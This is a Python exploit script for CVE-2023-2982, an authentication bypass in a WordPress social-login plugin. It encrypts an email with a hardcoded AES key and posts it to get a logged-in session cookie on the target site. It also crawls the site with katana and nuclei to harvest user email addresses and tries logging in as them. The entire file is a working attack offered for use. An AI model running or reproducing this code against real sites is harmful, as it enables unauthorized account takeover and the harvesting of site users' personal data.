#!/usr/bin/python3 import sys import getopt import requests import os from Cryptodome.Cipher import AES from Cryptodome.Util.Padding import pad##, unpad import base64 import argparse import random import string import requests import json import lxml.etree as ET import re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() passphrase = 'jMj7MEdu4wkHObiD' # Setting User-Agent for all requests. user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" session.headers.update({'User-Agent': user_agent}) random_string = ''.join(random.choices(string.digits, k=4)) def try_login(website_url,email): # format url website_url = website_url.rstrip('\/') + '/' # encrypt and encode email cipher = AES.new(passphrase.encode('utf-8'), AES.MODE_ECB) padded_email = pad(email.encode('utf-8'), AES.block_size) encrypted_email = cipher.encrypt(padded_email) encoded_email = base64.b64encode(encrypted_email).decode('utf-8') # post moopenid try: response = session.post(website_url, headers={'Content-Type': 'application/x-www-form-urlencoded'}, data={'option': 'moopenid', 'email': encoded_email, 'appName': 'rlHeqZw2vrPzOiWWfCParA=='}, allow_redirects=False,verify=False,timeout=10) if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): # Opening the file and replacing the desired strings with open("login.html", 'r') as file: file_content = file.read() replaced_content = file_content.replace('WEBSITE_REPLACE', website_url).replace('EMAIL_REPLACE', encoded_email) # Writing the updated content back to the file with open("login-"+random_string+".html", 'w') as file: file.write(replaced_content) print("Login Worked!") print("To Login again open login-"+random_string+".html") os.system("open login-"+random_string+".html") else: print("Login Failed with "+email+"") except requests.exceptions.RequestException as e: print('Error occurred while logging in:', str(e)) def scan_and_extract(website_url): #print("Crawling "+website_url+" for email addresses.") cmd1 = "katana -kf all -u "+website_url+" -o /tmp/katana.txt" #used this template for better email regex pattern https://github.com/panch0r3d/nuclei-templates/blob/master/email-extraction.yaml cmd2 = "nuclei -l /tmp/katana.txt -t email-extraction.yaml -nc -nm -fr -o /tmp/nuc.txt" print("Crawling "+website_url+" for email addresses.") os.system(cmd1) print("Using Nuclei to extract emails from links") os.system(cmd2) with open("/tmp/nuc.txt", "r") as f: lines = f.readlines() emails = set() for line in lines: matches = re.findall(r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b', line) emails.update(matches) with open("/tmp/nuc.txt", "w") as f: for email in emails: f.write(email + "\n") try_login(website_url,email) def main(): parser = argparse.ArgumentParser(description='CVE-2023-2982.py') parser.add_argument('-w', '--website_url', required=True,help='Website URL') parser.add_argument('-e', '--email',required=False, help='Email') args = parser.parse_args() website_url = args.website_url email = args.email if args.email: try_login(website_url,email) else: scan_and_extract(website_url) if __name__ == "__main__": main()